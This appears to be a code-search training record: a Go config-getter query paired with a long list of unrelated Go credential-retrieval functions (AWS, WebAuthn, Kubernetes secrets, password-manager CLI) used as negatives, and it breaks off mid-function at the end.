func (s serverConfigV14) GetBrowser() string { serverConfigMu.RLock() defer serverConfigMu.RUnlock() return s.Browser }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func GetCredentials(parameters *ClientParameters) *Credentials {\n\treturn getCredentials(parameters)\n}", "func (m *Manager) GetCredentials() map[string]interface{} {\n\treturn map[string]interface{}{\"user\": m.user.User, \"pass\": m.user.Pass}\n}", "func (c *Client) GetCredentials(host string) (*Credentials, error) {\n\tvar stdout bytes.Buffer\n\n\tvar stderr bytes.Buffer\n\n\t// TODO: handle session expired error\n\tcmd := exec.Command(\"op\", \"--cache\", \"--session\", c.token, \"get\", \"item\", host) // nolint:gosec // TODO: validate\n\tcmd.Stdout = &stdout\n\tcmd.Stderr = &stderr\n\n\tif err := cmd.Run(); err != nil {\n\t\treturn nil, errors.New(stderr.String()) // nolint:goerr113 // TODO: refactor\n\t}\n\n\tvar res response\n\tif err := json.Unmarshal(stdout.Bytes(), &res); err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar username string\n\n\tvar password string\n\n\tfor _, field := range res.Details.Fields {\n\t\tif field.Name == \"username\" {\n\t\t\tusername = field.Value\n\t\t}\n\n\t\tif field.Name == \"password\" {\n\t\t\tpassword = field.Value\n\t\t}\n\t}\n\n\treturn &Credentials{\n\t\tUsername: username,\n\t\tPassword: password,\n\t}, nil\n}", "func (c *Client) GetCredentials(ctx context.Context, params *GetCredentialsInput, optFns ...func(*Options)) (*GetCredentialsOutput, error) {\n\tif params == nil {\n\t\tparams = &GetCredentialsInput{}\n\t}\n\n\tresult, metadata, err := c.invokeOperation(ctx, \"GetCredentials\", params, optFns, c.addOperationGetCredentialsMiddlewares)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tout := result.(*GetCredentialsOutput)\n\tout.ResultMetadata = metadata\n\treturn out, nil\n}", "func GetCredentials(ctx context.Context) *CredentialsCookie {\n\tcreds, _ := ctx.Value(\"creds\").(*CredentialsCookie)\n\treturn creds\n}", "func GetCredentials(env string) (credentials.Credential, error) {\n\t// get tokens or login\n\tstore, err := credentials.GetDefaultCredentialStore()\n\tif err != nil {\n\t\treturn credentials.Credential{}, err\n\t}\n\n\tif !utils.APIMExistsInEnv(env, utils.MainConfigFilePath) {\n\t\tfmt.Println(\"APIM does not exists in\", env, \"Add it using add env\")\n\t\tos.Exit(1)\n\t}\n\n\t// check for creds\n\tif !store.HasAPIM(env) {\n\t\tfmt.Println(\"Login to APIM in\", env)\n\t\terr = runLogin(store, env, \"\", \"\")\n\t\tif err != nil {\n\t\t\treturn credentials.Credential{}, err\n\t\t}\n\t\tfmt.Println()\n\t}\n\tcred, err := store.GetAPIMCredentials(env)\n\tif err != nil {\n\t\treturn credentials.Credential{}, err\n\t}\n\treturn cred, nil\n}", "func (b *Base) GetCredentials(ctx context.Context) (*Credentials, error) {\n\tvalue := ctx.Value(contextCredentialsFlag)\n\tif value != nil {\n\t\tctxCredStore, ok := value.(*contextCredentialsStore)\n\t\tif !ok {\n\t\t\treturn &Credentials{}, errContextCredentialsFailure\n\t\t}\n\n\t\tcreds := ctxCredStore.Get()\n\t\tif err := b.CheckCredentials(creds, true); err != nil {\n\t\t\treturn creds, fmt.Errorf(\"context credentials issue: %w\", err)\n\t\t}\n\t\treturn creds, nil\n\t}\n\n\terr := b.CheckCredentials(b.API.credentials, false)\n\tif err != nil {\n\t\treturn &Credentials{}, err\n\t}\n\tsubAccountOverride, ok := ctx.Value(contextSubAccountFlag).(string)\n\tb.API.credMu.RLock()\n\tdefer b.API.credMu.RUnlock()\n\tcreds := *b.API.credentials\n\tif ok {\n\t\tcreds.SubAccount = subAccountOverride\n\t}\n\treturn &creds, nil\n}", "func (doWebAuthn WebAuthn) GetCredentials(authenticatorID webauthn.AuthenticatorID) (retCredentials []*webauthn.Credential, err error) {\n\tb := webauthn.GetCredentials(authenticatorID)\n\treturn b.Do(doWebAuthn.ctxWithExecutor)\n}", "func (c *contextCredentialsStore) Get() *Credentials {\n\tc.mu.RLock()\n\tcreds := *c.creds\n\tc.mu.RUnlock()\n\treturn &creds\n}", "func (c *ContextCredentialsStore) Get() *Credentials {\n\tc.mu.RLock()\n\tcreds := *c.creds\n\tc.mu.RUnlock()\n\treturn &creds\n}", "func GetCredentials(req *modules.DataInfo, input *app.M4DApplication) error {\n\t// Set up a connection to the data catalog interface server.\n\tconn, err := grpc.Dial(utils.GetCredentialsManagerServiceAddress(), grpc.WithInsecure(), grpc.WithBlock())\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\tc := dc.NewDataCredentialServiceClient(conn)\n\n\t// Contact the server and print out its response.\n\tctx, cancel := context.WithTimeout(context.Background(), time.Minute)\n\tdefer cancel()\n\n\tdataCredentials, err := c.GetCredentialsInfo(ctx, &dc.DatasetCredentialsRequest{\n\t\tDatasetId: req.Context.DataSetID,\n\t\tAppId: utils.CreateAppIdentifier(input)})\n\tif err != nil {\n\t\treturn err\n\t}\n\treq.Credentials = dataCredentials\n\n\treturn nil\n}", "func (l *DatabaseCrendentialBackend) GetCredentials(clusterId string) (*m.ClusterCredentials, error) {\n\tcredentials := sqlstore.GetCredentials(clusterId)\n\treturn credentials, nil\n}", "func GetCredentials(datasetID string, req *modules.DataInfo, input *app.M4DApplication) error {\n\t// Set up a connection to the data catalog interface server.\n\tconn, err := grpc.Dial(utils.GetCredentialsManagerServiceAddress(), grpc.WithInsecure(), grpc.WithBlock())\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\tc := dc.NewDataCredentialServiceClient(conn)\n\n\t// Contact the server and print out its response.\n\tctx, cancel := context.WithTimeout(context.Background(), time.Minute)\n\tdefer cancel()\n\n\tdataCredentials, err := c.GetCredentialsInfo(ctx, &dc.DatasetCredentialsRequest{\n\t\tDatasetId: datasetID,\n\t\tAppId: utils.CreateAppIdentifier(input)})\n\tif err != nil {\n\t\treturn err\n\t}\n\treq.Credentials = dataCredentials.DeepCopy()\n\n\treturn nil\n}", "func (k *Kluster) GetCredentials() ([]string, error) {\n\tcredentials, err := k.loadCredentials()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// k.ui.Log.Debugf(\"credentials load from environment for platform %s. (%v)\", credentials.platform(), credentials.parameters())\n\t// assign the credentials to the cluster provisioner\n\tparams := credentials.parameters()\n\t// k.Credentials(params...)\n\n\treturn params, nil\n}", "func (o *Command) GetCredentials(rw io.Writer, req io.Reader) command.Error {\n\tvcRecords, err := o.verifiableStore.GetCredentials()\n\tif err != nil {\n\t\tlogutil.LogError(logger, CommandName, GetCredentialsCommandMethod, \"get credential records : \"+err.Error())\n\n\t\treturn command.NewValidationError(GetCredentialsErrorCode, fmt.Errorf(\"get credential records : %w\", err))\n\t}\n\n\tcommand.WriteNillableResponse(rw, &RecordResult{\n\t\tResult: vcRecords,\n\t}, logger)\n\n\tlogutil.LogDebug(logger, CommandName, GetCredentialsCommandMethod, \"success\")\n\n\treturn nil\n}", "func Get(program ProgramFunc, serverURL string) (*credentials.Credentials, error) {\n\tcmd := program(\"get\")\n\tcmd.Input(strings.NewReader(serverURL))\n\n\tout, err := cmd.Output()\n\tif err != nil {\n\t\tt := strings.TrimSpace(string(out))\n\n\t\tif credentials.IsErrCredentialsNotFoundMessage(t) {\n\t\t\treturn nil, credentials.NewErrCredentialsNotFound()\n\t\t}\n\n\t\treturn nil, fmt.Errorf(\"error getting credentials - err: %v, out: `%s`\", err, t)\n\t}\n\n\tresp := &credentials.Credentials{\n\t\tServerURL: serverURL,\n\t}\n\n\tif err := json.NewDecoder(bytes.NewReader(out)).Decode(resp); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn resp, nil\n}", "func (o *Service) GetCredentials() map[string]map[string]bool {\n\tif o == nil || o.Credentials == nil {\n\t\tvar ret map[string]map[string]bool\n\t\treturn ret\n\t}\n\treturn *o.Credentials\n}", "func GetCredentials(isExternal bool) *credentials.Credentials {\n\tmu.Lock()\n\tif credentialChain == nil {\n\t\tcredProviders := defaults.CredProviders(defaults.Config(), defaults.Handlers())\n\t\tcredProviders = append(credProviders, providers.NewRotatingSharedCredentialsProvider())\n\t\tcredentialChain = credentials.NewCredentials(&credentials.ChainProvider{\n\t\t\tVerboseErrors: false,\n\t\t\tProviders: credProviders,\n\t\t})\n\t}\n\tmu.Unlock()\n\n\t// credentials.Credentials is concurrency-safe, so lock not needed here\n\tv, err := credentialChain.Get()\n\tif err != nil {\n\t\tseelog.Errorf(\"Error getting ECS instance credentials from default chain: %s\", err)\n\t} else {\n\t\tseelog.Infof(\"Successfully got ECS instance credentials from provider: %s\", v.ProviderName)\n\t}\n\treturn credentialChain\n}", "func (l *FixtureCredentialBackend) GetCredentials(clusterId string) (*m.ClusterCredentials, error) {\n\tresult := l.credentials[clusterId]\n\tif result == nil {\n\t\treturn nil, fmt.Errorf(\"credentials not found for %s\", clusterId)\n\t}\n\treturn result, nil\n}", "func (om *Sdk) GetCredentials(name, credential string) (*SimpleCredential, error) {\n\tproductGUID, err := om.productGUIDByType(name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tout, err := om.api.GetDeployedProductCredential(api.GetDeployedProductCredentialInput{\n\t\tDeployedGUID: productGUID,\n\t\tCredentialReference: credential,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &SimpleCredential{\n\t\tIdentity: out.Credential.Value[\"identity\"],\n\t\tPassword: out.Credential.Value[\"password\"],\n\t}, nil\n}", "func (c *WebAuthn) GetCredentials(authenticatorId string) ([]*WebAuthnCredential, error) {\n\tvar v WebAuthnGetCredentialsParams\n\tv.AuthenticatorId = authenticatorId\n\treturn c.GetCredentialsWithParams(&v)\n}", "func (dsc *DataSourceConfig) GetCredentials() *Credentials {\n\tif num := len(dsc.creds); num > 0 {\n\t\tvar creds []*Credentials\n\t\tfor _, c := range dsc.creds {\n\t\t\tcreds = append(creds, c)\n\t\t}\n\t\treturn creds[rand.Intn(num)]\n\t}\n\treturn nil\n}", "func credentials() *centrifuge.Credentials {\n\t// Never show secret to client of your application. Keep it on your application backend only.\n\tsecret := \"secret\"\n\t// Application user ID.\n\tuser := \"42\"\n\t// Current timestamp as string.\n\ttimestamp := centrifuge.Timestamp()\n\t// Empty info.\n\tinfo := \"\"\n\t// Generate client token so Centrifugo server can trust connection parameters received from client.\n\ttoken := auth.GenerateClientToken(secret, user, timestamp, info)\n\n\treturn &centrifuge.Credentials{\n\t\tUser: user,\n\t\tTimestamp: timestamp,\n\t\tInfo: info,\n\t\tToken: token,\n\t}\n}", "func (m *DeviceLocalCredentialInfo) GetCredentials()([]DeviceLocalCredentialable) {\n val, err := m.GetBackingStore().Get(\"credentials\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.([]DeviceLocalCredentialable)\n }\n return nil\n}", "func (CcsAwsSession *ccsAwsSession) GetCredentials() (*credentials.Value, error) {\n\tif err := CcsAwsSession.GetAWSSessions(); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create aws session to retrieve credentials: %v\", err)\n\t}\n\n\tcreds, err := CcsAwsSession.session.Config.Credentials.Get()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get aws credentials: %v\", err)\n\t}\n\treturn &creds, nil\n}", "func (p *TempCredentialsProvider) Credentials() (*aws.Credentials, error) {\n\tif time.Now().After(p.nextRefresh) {\n\t\terr := p.Refresh()\n\t\tif err != nil {\n\t\t\t// Retry next time around - don't wait for p.Duration to elapse.\n\t\t\tlog.Printf(\"TempCredentialsProvider failed to refresh credentials: %s\\n\", err)\n\t\t\treturn nil, err\n\t\t}\n\n\t\t// Schedule next refresh 5 minutes before the credentials are due to expire.\n\t\tp.nextRefresh = time.Now().Add(p.Duration - (5 * time.Minute))\n\t}\n\n\t// Transpose the temporary sts.Credentials into aws.Credentials.\n\treturn &aws.Credentials{\n\t\tAccessKeyID: *p.role.Credentials.AccessKeyID,\n\t\tSecretAccessKey: *p.role.Credentials.SecretAccessKey,\n\t\tSessionToken: *p.role.Credentials.SessionToken,\n\t}, nil\n}", "func (handler *Handler) GetCredentials(ctx context.Context, _ *sync.WaitGroup, startupTimer startup.Timer,\n\tdic *di.Container) bool {\n\tlc := bootstrapContainer.LoggingClientFrom(dic.Get)\n\tconfig := container.ConfigurationFrom(dic.Get)\n\tsecretProvider := bootstrapContainer.SecretProviderFrom(dic.Get)\n\n\tvar credentials *bootstrapConfig.Credentials\n\n\tfor startupTimer.HasNotElapsed() {\n\t\t// retrieve mosquitto credentials from secretstore\n\t\tsecrets, err := secretProvider.GetSecret(config.SecureMosquitto.SecretName)\n\t\tif err == nil {\n\t\t\tcredentials = &bootstrapConfig.Credentials{\n\t\t\t\tUsername: secrets[secret.UsernameKey],\n\t\t\t\tPassword: secrets[secret.PasswordKey],\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\n\t\tlc.Warnf(\"Could not retrieve mosquitto credentials (startup timer has not expired): %s\", err.Error())\n\t\tstartupTimer.SleepForInterval()\n\t}\n\n\tif credentials == nil {\n\t\tlc.Error(\"Failed to retrieve mosquitto credentials before startup timer expired\")\n\t\treturn false\n\t}\n\n\thandler.credentials = *credentials\n\treturn true\n}", "func (p *credentialProvider) Retrieve() (aws.Credentials, error) {\n\tawscred := aws.Credentials{\n\t\tSecretAccessKey: p.SecretAccessKey,\n\t\tAccessKeyID: p.AccessKeyID,\n\t}\n\n\treturn awscred, nil\n}", "func (c *Client) Credentials() string {\n\ts0 := hex.EncodeToString(c.i)\n\ts1 := hex.EncodeToString(c.A.Bytes())\n\treturn s0 + \":\" + s1\n}", "func (w *ServerInterfaceWrapper) GetCredentials(ctx echo.Context) error {\n\tvar err error\n\t// ------------- Path parameter \"id\" -------------\n\tvar id int\n\n\terr = runtime.BindStyledParameter(\"simple\", false, \"id\", ctx.Param(\"id\"), &id)\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, fmt.Sprintf(\"Invalid format for parameter id: %s\", err))\n\t}\n\n\tctx.Set(\"OAuth.Scopes\", []string{\"\"})\n\n\t// Invoke the callback with all the unmarshalled arguments\n\terr = w.Handler.GetCredentials(ctx, id)\n\treturn err\n}", "func (mds *metadataService) getCredentials(w http.ResponseWriter, r *http.Request) {\n\tcreds, err := mds.creds.GetCredentials()\n\tif err != nil {\n\t\tw.WriteHeader(500)\n\t\tfmt.Fprint(w, err.Error())\n\t\treturn\n\t}\n\n\tresp := &securityCredentialsResponse{\n\t\tCode: \"Success\",\n\t\tLastUpdated: time.Now().UTC().Format(time.RFC3339),\n\t\tType: \"AWS-HMAC\",\n\t\tAccessKeyId: *creds.AccessKeyId,\n\t\tSecretAccessKey: *creds.SecretAccessKey,\n\t\tToken: *creds.SessionToken,\n\t\tExpiration: creds.Expiration.UTC().Format(time.RFC3339),\n\t}\n\trespBody, err := json.Marshal(resp)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tw.Write(respBody)\n}", "func (g *Git) GetRemoteCredentials(c *cli.Context) (string, string, string, error) {\n\tif c.GlobalString(\"token\") == \"\" {\n\t\treturn \"\", \"\", \"\", errors.New(\"Flag `--token` not set.\\nPlease provide a personal access token via flag `--token` or environment variable `GCHL_GITHUB_TOKEN`\")\n\t}\n\n\tif remote := c.GlobalString(\"remote\"); remote != \"\" {\n\t\tuser, repo, err := parseRemoteString(remote)\n\t\treturn user, repo, c.GlobalString(\"token\"), err\n\t}\n\n\tremotes, err := g.repo.Remotes()\n\tif err != nil {\n\t\treturn \"\", \"\", \"\", err\n\t}\n\n\tif len(remotes) == 0 {\n\t\treturn \"\", \"\", \"\", errors.New(\"No `--remote` flag provided and current repository does not have a remote origin\")\n\t}\n\n\tremote := remotes[0].Config().URLs[0]\n\tuser, repo, err := parseRemoteString(remote)\n\treturn user, repo, c.GlobalString(\"token\"), err\n}", "func GetCredential(c *Credentials) error {\n\trow, cancel, err := db.ConnManager.QueryRow(sqlCredentialsGet, c.Id)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer cancel()\n\tc.Site = &sites.Site{}\n\tif err := row.Scan(&c.Id, &c.Login, &c.Password, &c.Site.Id, &c.Site.Name, &c.Site.Host); err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\treturn ErrCredentialsNotFound\n\t\t}\n\t\treturn err\n\t}\n\treturn nil\n}", "func (a *Client) V2GetCredentials(ctx context.Context, params *V2GetCredentialsParams) (*V2GetCredentialsOK, error) {\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"V2GetCredentials\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/v2/clusters/{cluster_id}/credentials\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"http\", \"https\"},\n\t\tParams: params,\n\t\tReader: &V2GetCredentialsReader{formats: a.formats},\n\t\tAuthInfo: a.authInfo,\n\t\tContext: ctx,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn result.(*V2GetCredentialsOK), nil\n\n}", "func (s *Server) Credentials() string {\n\n\ts0 := hex.EncodeToString(s.salt)\n\ts1 := hex.EncodeToString(s.xB.Bytes())\n\treturn s0 + \":\" + s1\n}", "func (c *Client) Credentials() string {\n\tvar b bytes.Buffer\n\n\tb.WriteString(hex.EncodeToString(c.i))\n\tb.WriteByte(':')\n\tb.WriteString(hex.EncodeToString(c.xA.Bytes()))\n\treturn b.String()\n}", "func GetCredentialsFile() (*CredentialsFile, error) {\n\thome := func() string {\n\t\tif runtime.GOOS == \"windows\" {\n\t\t\treturn os.Getenv(\"USERPROFILE\")\n\t\t}\n\t\treturn os.Getenv(\"HOME\")\n\t}\n\tpath := filepath.Join(home(), \".aws\", \"credentials\")\n\tif p := os.Getenv(\"AWS_SHARED_CREDENTIALS_FILE\"); len(p) > 0 {\n\t\tpath = p\n\t}\n\tini.DefaultHeader = true\n\tf, err := ini.InsensitiveLoad(path)\n\treturn &CredentialsFile{f, path}, err\n}", "func (t *Application) cliCredentials() (*credentials.Credentials, error) {\n\tif *t.Token != \"\" && *t.Hub == \"\" {\n\t\treturn nil, trace.BadParameter(\"--hub flag must be provided if --token flag is provided\")\n\t}\n\tif *t.Hub != \"\" {\n\t\treturn credentials.FromTokenAndHub(*t.Token, *t.Hub), nil\n\t}\n\treturn nil, trace.NotFound(\"no CLI credentials provided\")\n}", "func (w *Registration) Credentials() (Credentials, error) {\n\tw.mutex.Lock()\n\tcred := w.curCredentials\n\tw.mutex.Unlock()\n\tif cred == nil {\n\t\treturn Credentials{}, errors.New(\"Not ready\")\n\t}\n\treturn *cred, nil\n}", "func (s serverConfigV14) GetCredential() credential {\n\tserverConfigMu.RLock()\n\tdefer serverConfigMu.RUnlock()\n\n\treturn s.Credential\n}", "func (in *Credentials) DeepCopy() *Credentials {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(Credentials)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (c *Server) Credentials() string {\n\n\ts0 := hex.EncodeToString(c.s)\n\ts1 := hex.EncodeToString(c.B.Bytes())\n\treturn s0 + \":\" + s1\n}", "func (p *PorterHelper) Get(serverURL string) (user string, secret string, err error) {\n\treturn p.AuthGetter.GetCredentials(serverURL)\n}", "func NewCredentials() *Credentials {\n\t// TODO savefile\n\treturn &Credentials{users: map[string]string{}}\n}", "func (p *CredentialsCache) Retrieve(ctx context.Context) (Credentials, error) {\n\tif creds := p.getCreds(); creds != nil {\n\t\treturn *creds, nil\n\t}\n\n\tresCh := p.sf.DoChan(\"\", func() (interface{}, error) {\n\t\treturn p.singleRetrieve(&suppressedContext{ctx})\n\t})\n\tselect {\n\tcase res := <-resCh:\n\t\treturn res.Val.(Credentials), res.Err\n\tcase <-ctx.Done():\n\t\treturn Credentials{}, &RequestCanceledError{Err: ctx.Err()}\n\t}\n}", "func Credentials(ctx context.Context, scopes ...string) *google.Credentials {\n\treturn CredentialsEnv(ctx, envPrivateKey, scopes...)\n}", "func (s *SendPaymentFormRequest) GetCredentials() (value InputCredentialsClass) {\n\tif s == nil {\n\t\treturn\n\t}\n\treturn s.Credentials\n}", "func GetCredentialsSecret(coreClient client.Client, namespace string, secretName string) (*Creds, error) {\n\tvar credentialsSecret apicorev1.Secret\n\tkey := client.ObjectKey{Namespace: namespace, Name: secretName}\n\n\tif err := coreClient.Get(context.Background(), key, &credentialsSecret); err != nil {\n\t\tif errors.IsNotFound(err) {\n\t\t\treturn nil, fmt.Errorf(\n\t\t\t\t\"error credentials secret %s not found in namespace %s: %w\", secretName, namespace, err)\n\t\t}\n\t\treturn nil, fmt.Errorf(\n\t\t\t\"error getting credentials secret %s in namespace %s: %w\", secretName, namespace, err)\n\t}\n\n\to := Creds{}\n\to.URL = string(credentialsSecret.Data[UrlField])\n\to.Username = string(credentialsSecret.Data[UsernameField])\n\to.Password = string(credentialsSecret.Data[PasswordField])\n\to.CAFile = string(credentialsSecret.Data[CafileField])\n\tinsecure, err := strconv.ParseBool(string(credentialsSecret.Data[InsecureField]))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to identify %s in credentials %w\", InsecureField, err)\n\t}\n\to.Insecure = insecure\n\to.CABundle = string(credentialsSecret.Data[CaBundleField])\n\n\t// write CA bundle to a file if exist.\n\t// its best if we could mount the secret into a file,\n\t// but this controller deployment cannot\n\tif o.CABundle != \"\" {\n\t\tcaFilePath, err := writeCA(strings.NewReader(o.CABundle))\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"failed to extract and store the CA %s\", err)\n\t\t\treturn nil, err\n\t\t}\n\t\to.CAFile = caFilePath\n\t}\n\treturn &o, nil\n}", "func (t *AuthorizationTransport) GetCredential() (string, string, string) {\n\tt.rwLocker.RLock()\n\tdefer t.rwLocker.RUnlock()\n\treturn t.SecretID, t.SecretKey, t.SessionToken\n}", "func (auth *JWTAuth) GetCreds() []string {\n\tcreds := []string{auth.JWT}\n\treturn creds\n}", "func setCredentials() *credentials.Credentials {\n\t// First, try the credentials file set by AWS CLI tool.\n\t// Note the empty string instructs to look under default file path (different based on OS).\n\t// This file can have multiple profiles and a default profile will be used unless otherwise configured.\n\t// See: https://godoc.org/github.com/aws/aws-sdk-go/aws/credentials#SharedCredentialsProvider\n\tcreds := credentials.NewSharedCredentials(\"\", cfg.AWS.Profile)\n\n\t// Second, use environment variables if set. The following are checked:\n\t// Access Key ID: AWS_ACCESS_KEY_ID or AWS_ACCESS_KEY\n\t// Secret Access Key: AWS_SECRET_ACCESS_KEY or AWS_SECRET_KEY\n\tenvCreds := credentials.NewEnvCredentials()\n\tsetCreds, _ := envCreds.Get()\n\t// error apparently does not return if environment variables weren't set\n\t// so check what was set and look for empty strings, don't want to set empty creds\n\tif setCreds.AccessKeyID != \"\" && setCreds.SecretAccessKey != \"\" {\n\t\tcreds = envCreds\n\t}\n\n\t// Last, if credentials were passed via CLI, always prefer those\n\tif cfg.AWS.AccessKeyID != \"\" && cfg.AWS.SecretAccessKey != \"\" {\n\t\tcreds = credentials.NewStaticCredentials(cfg.AWS.AccessKeyID, cfg.AWS.SecretAccessKey, \"\")\n\t}\n\n\treturn creds\n}", "func RetrieveCreds(accessKey, secretKey, sessionToken string, logger logr.Logger) (*credentials.Credentials, error) {\n\tcredConfig := &CredentialsConfig{\n\t\tAccessKey: accessKey,\n\t\tSecretKey: secretKey,\n\t\tSessionToken: sessionToken,\n\t\tlog: logger,\n\t}\n\tcreds, err := credConfig.GenerateCredentialChain()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif creds == nil {\n\t\treturn nil, fmt.Errorf(\"could not compile valid credential providers from static config, environment, shared, or instance metadata\")\n\t}\n\n\t_, err = creds.Get()\n\tif err != nil {\n\t\treturn nil, errwrap.Wrapf(\"failed to retrieve credentials from credential chain: {{err}}\", err)\n\t}\n\treturn creds, nil\n}", "func GetCredentialsServer() CredentialsServer {\n\tcs, ok := AllCredentialsServers[dbCredentialsServer]\n\tif !ok {\n\t\tlog.Exitf(\"Invalid credential server: %v\", dbCredentialsServer)\n\t}\n\treturn cs\n}", "func (c *Client) ListMyCredentials() ([]*api.Credential, error) {\n\tvar out []*api.Credential\n\trawURL := fmt.Sprintf(pathCredentials, c.base.String())\n\terr := c.get(rawURL, true, &out)\n\treturn out, errio.Error(err)\n}", "func (auth *KeySecretAuth) GetCreds() []string {\n\tcreds := []string{auth.apiKey, auth.apiSecret}\n\treturn creds\n}", "func NewCredentialsProvider(\n\tgetCredentials CredentialsCallback,\n\tverifyCredentials VerifyCredentialsCallback,\n\tchooseCredentialHelper ChooseCredentialHelperCallback) CredentialsProvider {\n\n\tif verifyCredentials == nil {\n\t\tverifyCredentials = CheckAuth\n\t}\n\n\tif chooseCredentialHelper == nil {\n\t\tchooseCredentialHelper = func(available []string) (string, error) {\n\t\t\treturn \"\", nil\n\t\t}\n\t}\n\n\tauthFilePath := filepath.Join(fn.ConfigPath(), \"auth.json\")\n\tsys := &containersTypes.SystemContext{\n\t\tAuthFilePath: authFilePath,\n\t}\n\n\thome, err := os.UserHomeDir()\n\tif err != nil {\n\t\tpanic(err)\n\t\t//return result, fmt.Errorf(\"failed to determine home directory: %w\", err)\n\t}\n\tdockerConfigPath := filepath.Join(home, \".docker\", \"config.json\")\n\n\treturn func(ctx context.Context, registry string) (Credentials, error) {\n\t\tresult := Credentials{}\n\n\t\tfor _, load := range []func() (containersTypes.DockerAuthConfig, error){\n\t\t\tfunc() (containersTypes.DockerAuthConfig, error) {\n\t\t\t\treturn config.GetCredentials(sys, registry)\n\t\t\t},\n\t\t\tfunc() (containersTypes.DockerAuthConfig, error) {\n\t\t\t\treturn getCredentialsByCredentialHelper(authFilePath, registry)\n\t\t\t},\n\t\t\tfunc() (containersTypes.DockerAuthConfig, error) {\n\t\t\t\treturn getCredentialsByCredentialHelper(dockerConfigPath, registry)\n\t\t\t},\n\t\t} {\n\t\t\tvar credentials containersTypes.DockerAuthConfig\n\t\t\tcredentials, err = load()\n\n\t\t\tif err != nil && !errors.Is(err, errCredentialsNotFound) {\n\t\t\t\treturn Credentials{}, err\n\t\t\t}\n\n\t\t\tif credentials != (containersTypes.DockerAuthConfig{}) {\n\t\t\t\tresult.Username, result.Password = credentials.Username, credentials.Password\n\n\t\t\t\terr = verifyCredentials(ctx, result.Username, result.Password, registry)\n\t\t\t\tif err == nil {\n\t\t\t\t\treturn result, nil\n\t\t\t\t} else {\n\t\t\t\t\tif !errors.Is(err, ErrUnauthorized) {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tfor {\n\t\t\tresult, err = getCredentials(registry)\n\t\t\tif err != nil {\n\t\t\t\treturn Credentials{}, err\n\t\t\t}\n\n\t\t\terr = verifyCredentials(ctx, result.Username, result.Password, registry)\n\t\t\tif err == nil {\n\t\t\t\terr = setCredentialsByCredentialHelper(authFilePath, registry, result.Username, result.Password)\n\t\t\t\tif err != nil {\n\t\t\t\t\tif !errors.Is(err, errNoCredentialHelperConfigured) {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t\thelpers := listCredentialHelpers()\n\t\t\t\t\thelper, err := chooseCredentialHelper(helpers)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t\thelper = strings.TrimPrefix(helper, \"docker-credential-\")\n\t\t\t\t\terr = setCredentialHelperToConfig(authFilePath, helper)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn Credentials{}, fmt.Errorf(\"faild to set the helper to the config: %w\", err)\n\t\t\t\t\t}\n\t\t\t\t\terr = setCredentialsByCredentialHelper(authFilePath, registry, result.Username, result.Password)\n\t\t\t\t\tif err != nil && !errors.Is(err, errNoCredentialHelperConfigured) {\n\t\t\t\t\t\treturn Credentials{}, err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn result, nil\n\t\t\t} else {\n\t\t\t\tif errors.Is(err, ErrUnauthorized) {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\treturn Credentials{}, err\n\t\t\t}\n\t\t}\n\t}\n}", "func (mock *MailgunMock) GetCredentialsCalls() []struct {\n\tLimit int\n\tSkip int\n} {\n\tvar calls []struct {\n\t\tLimit int\n\t\tSkip int\n\t}\n\tlockMailgunMockGetCredentials.RLock()\n\tcalls = mock.calls.GetCredentials\n\tlockMailgunMockGetCredentials.RUnlock()\n\treturn calls\n}", "func (pctx *processContext) gcpCredentials(ctx context.Context) (*google.Credentials, error) {\n\t// TODO(light): google.DefaultCredentials uses Getenv directly, so it is\n\t// difficult to disentangle to use processContext.\n\treturn gcp.DefaultCredentials(ctx)\n}", "func (c *WebAuthn) GetCredentialsWithParams(v *WebAuthnGetCredentialsParams) ([]*WebAuthnCredential, error) {\n\tresp, err := gcdmessage.SendCustomReturn(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: \"WebAuthn.getCredentials\", Params: v})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar chromeData struct {\n\t\tResult struct {\n\t\t\tCredentials []*WebAuthnCredential\n\t\t}\n\t}\n\n\tif resp == nil {\n\t\treturn nil, &gcdmessage.ChromeEmptyResponseErr{}\n\t}\n\n\t// test if error first\n\tcerr := &gcdmessage.ChromeErrorResponse{}\n\tjson.Unmarshal(resp.Data, cerr)\n\tif cerr != nil && cerr.Error != nil {\n\t\treturn nil, &gcdmessage.ChromeRequestErr{Resp: cerr}\n\t}\n\n\tif err := 